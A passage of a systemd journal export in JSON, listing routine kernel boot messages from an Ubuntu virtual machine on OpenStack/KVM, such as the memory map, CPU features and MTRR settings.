: "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8;b=e2b08827b5804427b422c10c84f1567e;m=55813c;t=5bd16dd1900a4;x=126a9f347823ed25", "__REALTIME_TIMESTAMP" : "1615280779886756", "__MONOTONIC_TIMESTAMP" : "5603644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9;b=e2b08827b5804427b422c10c84f1567e;m=558146;t=5bd16dd1900ae;x=f3457b360b1dc2a1", "__REALTIME_TIMESTAMP" : "1615280779886766", "__MONOTONIC_TIMESTAMP" : "5603654", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a;b=e2b08827b5804427b422c10c84f1567e;m=558152;t=5bd16dd1900b9;x=5f0007f265216832", "__REALTIME_TIMESTAMP" : "1615280779886777", "__MONOTONIC_TIMESTAMP" : "5603666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b;b=e2b08827b5804427b422c10c84f1567e;m=55815b;t=5bd16dd1900c3;x=ac0b779e15c3e2e4", "__REALTIME_TIMESTAMP" : "1615280779886787", "__MONOTONIC_TIMESTAMP" : "5603675", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c;b=e2b08827b5804427b422c10c84f1567e;m=558178;t=5bd16dd1900df;x=83cffa4921471e01", "__REALTIME_TIMESTAMP" : "1615280779886815", "__MONOTONIC_TIMESTAMP" : "5603704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: BIOS-provided physical RAM map:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d;b=e2b08827b5804427b422c10c84f1567e;m=558181;t=5bd16dd1900e8;x=3d6809c19f32501", "__REALTIME_TIMESTAMP" : "1615280779886824", "__MONOTONIC_TIMESTAMP" : "5603713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e;b=e2b08827b5804427b422c10c84f1567e;m=55818a;t=5bd16dd1900f1;x=86babca894ceac2f", "__REALTIME_TIMESTAMP" : "1615280779886833", "__MONOTONIC_TIMESTAMP" : "5603722", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f;b=e2b08827b5804427b422c10c84f1567e;m=558196;t=5bd16dd1900fe;x=9b0dc0acf836acae", "__REALTIME_TIMESTAMP" : "1615280779886846", "__MONOTONIC_TIMESTAMP" : "5603734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10;b=e2b08827b5804427b422c10c84f1567e;m=5581a3;t=5bd16dd19010a;x=dc8c8f4c503ce77c", "__REALTIME_TIMESTAMP" : "1615280779886858", "__MONOTONIC_TIMESTAMP" : "5603747", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000100000-0x000000007ffdbfff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11;b=e2b08827b5804427b422c10c84f1567e;m=5581b5;t=5bd16dd19011c;x=d98108b0778208d0", "__REALTIME_TIMESTAMP" : "1615280779886876", "__MONOTONIC_TIMESTAMP" : "5603765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000007ffdc000-0x000000007fffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12;b=e2b08827b5804427b422c10c84f1567e;m=5581c3;t=5bd16dd19012a;x=243e15a620c43f41", "__REALTIME_TIMESTAMP" : "1615280779886890", "__MONOTONIC_TIMESTAMP" : "5603779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000feffc000-0x00000000feffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13;b=e2b08827b5804427b422c10c84f1567e;m=5581cc;t=5bd16dd190134;x=9df9e25b4913d3c5", "__REALTIME_TIMESTAMP" : "1615280779886900", "__MONOTONIC_TIMESTAMP" : "5603788", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14;b=e2b08827b5804427b422c10c84f1567e;m=5581d5;t=5bd16dd19013d;x=36b965c29ff40590", "__REALTIME_TIMESTAMP" : "1615280779886909", "__MONOTONIC_TIMESTAMP" : "5603797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NX (Execute Disable) protection: active" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15;b=e2b08827b5804427b422c10c84f1567e;m=5581de;t=5bd16dd190146;x=c6690de411e5df17", "__REALTIME_TIMESTAMP" : "1615280779886918", "__MONOTONIC_TIMESTAMP" : "5603806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SMBIOS 2.8 present." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16;b=e2b08827b5804427b422c10c84f1567e;m=5581e7;t=5bd16dd19014f;x=c4fdbca5419d55f3", "__REALTIME_TIMESTAMP" : "1615280779886927", "__MONOTONIC_TIMESTAMP" : "5603815", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "DMI: OpenStack Foundation OpenStack Nova, BIOS 1.10.2-1ubuntu1 04/01/2014" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17;b=e2b08827b5804427b422c10c84f1567e;m=5581f3;t=5bd16dd19015a;x=de982aa3b245a14a", "__REALTIME_TIMESTAMP" : "1615280779886938", "__MONOTONIC_TIMESTAMP" : "5603827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Hypervisor detected: KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18;b=e2b08827b5804427b422c10c84f1567e;m=5581fc;t=5bd16dd190164;x=a542e74c0abd30a6", "__REALTIME_TIMESTAMP" : "1615280779886948", "__MONOTONIC_TIMESTAMP" : "5603836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: update [mem 0x00000000-0x00000fff] usable ==> reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19;b=e2b08827b5804427b422c10c84f1567e;m=558205;t=5bd16dd19016d;x=f6828ca424fd1ccb", "__REALTIME_TIMESTAMP" : "1615280779886957", "__MONOTONIC_TIMESTAMP" : "5603845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: remove [mem 0x000a0000-0x000fffff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a;b=e2b08827b5804427b422c10c84f1567e;m=55820f;t=5bd16dd190176;x=1ddef7fd13afc6c9", "__REALTIME_TIMESTAMP" : "1615280779886966", "__MONOTONIC_TIMESTAMP" : "5603855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: last_pfn = 0x7ffdc max_arch_pfn = 0x400000000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b;b=e2b08827b5804427b422c10c84f1567e;m=558217;t=5bd16dd19017f;x=b37967a7d5978781", "__REALTIME_TIMESTAMP" : "1615280779886975", "__MONOTONIC_TIMESTAMP" : "5603863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR default type: write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c;b=e2b08827b5804427b422c10c84f1567e;m=558220;t=5bd16dd190188;x=59ac1a4d33299f29", "__REALTIME_TIMESTAMP" : "1615280779886984", "__MONOTONIC_TIMESTAMP" : "5603872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR fixed ranges enabled:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d;b=e2b08827b5804427b422c10c84f1567e;m=558229;t=5bd16dd190191;x=dbfd08ab63661380", "__REALTIME_TIMESTAMP" : "1615280779886993", "__MONOTONIC_TIMESTAMP" : "5603881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 00000-9FFFF write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e;b=e2b08827b5804427b422c10c84f1567e;m=558232;t=5bd16dd190199;x=8e640bc12038fc0", "__REALTIME_TIMESTAMP" : "1615280779887001", "__MONOTONIC_TIMESTAMP" : "5603890", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " A0000-BFFFF uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f;b=e2b08827b5804427b422c10c84f1567e;m=55823b;t=5bd16dd1901a2;x=3ba105f65bb369a0", "__REALTIME_TIMESTAMP" : "1615280779887010", "__MONOTONIC_TIMESTAMP" : "5603899", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " C0000-FFFFF write-protect" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20;b=e2b08827b5804427b422c10c84f1567e;m=558244;t=5bd16dd1901ab;x=bf02c2451cebc555", "__REALTIME_TIMESTAMP" : "1615280779887019", "__MONOTONIC_TIMESTAMP" : "5603908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR variable ranges enabled:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21;b=e2b08827b5804427b422c10c84f1567e;m=558250;t=5bd16dd1901b8;x=3a0ef5af2fac8430", "__REALTIME_TIMESTAMP" : "1615280779887032", "__MONOTONIC_TIMESTAMP" : "5603920", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 0 base 0080000000 mask FF80000000 uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22;b=e2b08827b5804427b422c10c84f1567e;m=558259;t=5bd16dd1901c1;x=3662b4af19fec2c4", "__REALTIME_TIMESTAMP" : "1615280779887041", "__MONOTONIC_TIMESTAMP" : "5603929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 1 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23;b=e2b08827b5804427b422c10c84f1567e;m=558265;t=5bd16dd1901cc;x=d9edabc73fc9138c", "__REALTIME_TIMESTAMP" : "1615280779887052", "__MONOTONIC_TIMESTAMP" : "5603941", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 2 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24;b=e2b08827b5804427b422c10c84f1567e;m=55826d;t=5bd16dd1901d5;x=a1281317ddbe980", "__REALTIME_TIMESTAMP" : "1615280779887061", "__MONOTONIC_TIMESTAMP" : "5603949", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 3 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25;b=e2b08827b5804427b422c10c84f1567e;m=558276;t=5bd16dd1901de;x=c3c4e867250818c7", "__REALTIME_TIMESTAMP" : "1615280779887070", "__MONOTONIC_TIMESTAMP" : "5603958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 4 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26;b=e2b08827b5804427b422c10c84f1567e;m=55827f;t=5bd16dd1901e6;x=d74e81ef909ae85c", "__REALTIME_TIMESTAMP" : "1615280779887078", "__MONOTONIC_TIMESTAMP" : "5603967", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 5 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27;b=e2b08827b5804427b422c10c84f1567e;m=558288;t=5bd16dd1901ef;x=ecd4fa263890de6e", "__REALTIME_TIMESTAMP" : "1615280779887087", "__MONOTONIC_TIMESTAMP" : "5603976", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 6 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28;b=e2b08827b5804427b422c10c84f1567e;m=558291;t=5bd16dd1901f8;x=f8cc968f8f9e390b", "__REALTIME_TIMESTAMP" : "1615280779887096", "__MONOTONIC_TIMESTAMP" : "5603985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 7 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29;b=e2b08827b5804427b422c10c84f1567e;m=55829d;t=5bd16dd190205;x=d8b4a1c3e4d93a07", "__REALTIME_TIMESTAMP" : "1615280779887109", "__MONOTONIC_TIMESTAMP" : "5603997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/PAT: Configuration [0-7]: WB WC UC- UC WB WP UC- WT " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a;b=e2b08827b5804427b422c10c84f1567e;m=5582b6;t=5bd16dd19021d;x=a40abd55b189474a", "__REALTIME_TIMESTAMP" : "1615280779887133", "__MONOTONIC_TIMESTAMP" : "5604022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "found SMP MP-table at [mem 0x000f6a80-0x000f6a8f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b;b=e2b08827b5804427b422c10c84f1567e;m=5582be;t=5bd16dd190226;x=509ad16951a77cd3", "__REALTIME_TIMESTAMP" : "1615280779887142", "__MONOTONIC_TIMESTAMP" : "5604030", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Scanning 1 areas for low memory corruption" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c;b=e2b08827b5804427b422c10c84f1567e;m=5582ca;t=5bd16dd190231;x=fa904621ba25687f", "__REALTIME_TIMESTAMP" : "1615280779887153", "__MONOTONIC_TIMESTAMP" : "5604042", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using GB pages for direct mapping" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d;b=e2b08827b5804427b422c10c84f1567e;m=5582eb;t=5bd16dd190253;x=189beb4897315588", "__REALTIME_TIMESTAMP" : "1615280779887187", "__MONOTONIC_TIMESTAMP" : "5604075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c740000, 0x3c740fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e;b=e2b08827b5804427b422c10c84f1567e;m=5582f5;t=5bd16dd19025d;x=e5585ff116a8653d", "__REALTIME_TIMESTAMP" : "1615280779887197", "__MONOTONIC_TIMESTAMP" : "5604085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c741000, 0x3c741fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f;b=e2b08827b5804427b422c10c84f1567e;m=558303;t=5bd16dd19026a;x=d13f73606857f1af", "__REALTIME_TIMESTAMP" : "1615280779887210", "__MONOTONIC_TIMESTAMP" : "5604099", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c742000, 0x3c742fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30;b=e2b08827b5804427b422c10c84f1567e;m=55830c;t=5bd16dd190274;x=261516535cb52e0e", "__REALTIME_TIMESTAMP" : "1615280779887220", "__MONOTONIC_TIMESTAMP" : "5604108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 